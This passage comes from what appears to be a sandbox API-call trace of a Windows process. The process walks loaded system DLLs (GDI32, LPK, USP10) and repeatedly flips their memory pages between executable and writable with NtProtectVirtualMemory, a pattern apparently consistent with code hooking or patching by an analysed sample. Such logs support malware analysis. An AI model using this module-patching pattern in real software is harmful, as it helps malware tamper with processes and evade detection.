NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.609] GetCurrentProcess () returned 0xffffffff [0068.609] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77140528, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.609] GetCurrentProcess () returned 0xffffffff [0068.609] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77140528, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.610] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.611] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0068.611] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0068.612] GetModuleFileNameA (in: hModule=0x770a0000, lpFilename=0x6ef4a4, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0068.612] GetCurrentProcess () returned 0xffffffff [0068.612] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b0024, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.612] GetCurrentProcess () returned 0xffffffff [0068.612] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b0024, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.612] GetCurrentProcess () returned 0xffffffff [0068.612] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b0028, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.612] GetCurrentProcess () returned 0xffffffff [0068.612] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b0028, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.613] GetCurrentProcess () returned 0xffffffff [0068.613] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b002c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.613] GetCurrentProcess () returned 0xffffffff [0068.613] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b002c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.613] GetCurrentProcess () returned 0xffffffff [0068.613] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b0048, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.613] GetCurrentProcess () returned 0xffffffff [0068.613] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b0048, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.613] GetCurrentProcess () returned 0xffffffff [0068.613] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b0050, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.614] GetCurrentProcess () returned 0xffffffff [0068.614] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b0050, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.614] GetCurrentProcess () returned 0xffffffff [0068.614] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b0070, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.615] GetCurrentProcess () returned 0xffffffff [0068.615] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b0070, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.617] GetCurrentProcess () returned 0xffffffff [0068.617] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b00a0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.617] GetCurrentProcess () returned 0xffffffff [0068.617] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b00a0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.617] GetCurrentProcess () returned 0xffffffff [0068.617] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b00a4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.617] GetCurrentProcess () returned 0xffffffff [0068.617] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b00a4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.618] GetCurrentProcess () returned 0xffffffff [0068.618] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b00a8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.618] GetCurrentProcess () returned 0xffffffff [0068.618] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b00a8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.618] GetCurrentProcess () returned 0xffffffff [0068.618] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b00b0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.618] GetCurrentProcess () returned 0xffffffff [0068.618] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b00b0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.618] GetCurrentProcess () returned 0xffffffff [0068.618] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b00c4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.619] GetCurrentProcess () returned 0xffffffff [0068.619] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b00c4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.619] GetCurrentProcess () returned 0xffffffff [0068.619] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b00cc, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.619] GetCurrentProcess () returned 0xffffffff [0068.619] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b00cc, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.619] GetCurrentProcess () returned 0xffffffff [0068.619] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b00d0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.619] GetCurrentProcess () returned 0xffffffff [0068.619] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b00d0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.620] GetCurrentProcess () returned 0xffffffff [0068.620] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b00d4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.620] GetCurrentProcess () returned 0xffffffff [0068.620] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b00d4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.620] GetCurrentProcess () returned 0xffffffff [0068.620] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b0108, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.620] GetCurrentProcess () returned 0xffffffff [0068.620] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x770b0108, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x770b0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.621] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.621] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0068.622] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0068.622] GetModuleFileNameA (in: hModule=0x76c60000, lpFilename=0x6ef4a4, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\LPK.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")) returned 0x1b [0068.622] GetCurrentProcess () returned 0xffffffff [0068.622] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c6103c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c61000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.622] GetCurrentProcess () returned 0xffffffff [0068.622] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c6103c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c61000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.622] GetCurrentProcess () returned 0xffffffff [0068.622] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c61044, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c61000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.622] GetCurrentProcess () returned 0xffffffff [0068.622] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c61044, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c61000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.623] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.624] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0068.624] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0068.624] GetModuleFileNameA (in: hModule=0x76c70000, lpFilename=0x6ef4a4, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\USP10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")) returned 0x1d [0068.624] GetCurrentProcess () returned 0xffffffff [0068.624] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c710d8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.624] GetCurrentProcess () returned 0xffffffff [0068.624] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c710d8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.624] GetCurrentProcess () returned 0xffffffff [0068.624] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c710e0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.625] GetCurrentProcess () returned 0xffffffff [0068.625] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c710e0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.625] GetCurrentProcess () returned 0xffffffff [0068.625] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c710e4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.625] GetCurrentProcess () returned 0xffffffff [0068.625] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c710e4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.625] GetCurrentProcess () returned 0xffffffff [0068.625] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c710f8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.625] GetCurrentProcess () returned 0xffffffff [0068.626] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c710f8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.626] GetCurrentProcess () returned 0xffffffff [0068.626] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c71130, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.626] GetCurrentProcess () returned 0xffffffff [0068.626] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c71130, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.626] GetCurrentProcess () returned 0xffffffff [0068.626] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c71134, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.626] GetCurrentProcess () returned 0xffffffff [0068.626] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c71134, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.627] GetCurrentProcess () returned 0xffffffff [0068.627] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c71138, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.627] GetCurrentProcess () returned 0xffffffff [0068.627] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c71138, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.627] GetCurrentProcess () returned 0xffffffff [0068.627] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c7113c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.627] GetCurrentProcess () returned 0xffffffff [0068.627] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c7113c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.627] GetCurrentProcess () returned 0xffffffff [0068.627] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c71164, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.628] GetCurrentProcess () returned 0xffffffff [0068.628] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c71164, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.628] GetCurrentProcess () returned 0xffffffff [0068.628] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c71180, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.628] GetCurrentProcess () returned 0xffffffff [0068.628] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c71180, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.628] GetCurrentProcess () returned 0xffffffff [0068.628] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c71184, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.628] GetCurrentProcess () returned 0xffffffff [0068.629] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c71184, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.629] GetCurrentProcess () returned 0xffffffff [0068.629] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c71188, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.629] GetCurrentProcess () returned 0xffffffff [0068.629] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c71188, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.629] GetCurrentProcess () returned 0xffffffff [0068.629] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c71190, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.629] GetCurrentProcess () returned 0xffffffff [0068.629] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c71190, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.629] GetCurrentProcess () returned 0xffffffff [0068.630] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c7119c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.630] GetCurrentProcess () returned 0xffffffff [0068.630] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76c7119c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76c71000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.630] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.631] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0068.631] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0068.631] GetModuleFileNameA (in: hModule=0x76f90000, lpFilename=0x6ef4a4, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\msvcrt.dll" (normalized: 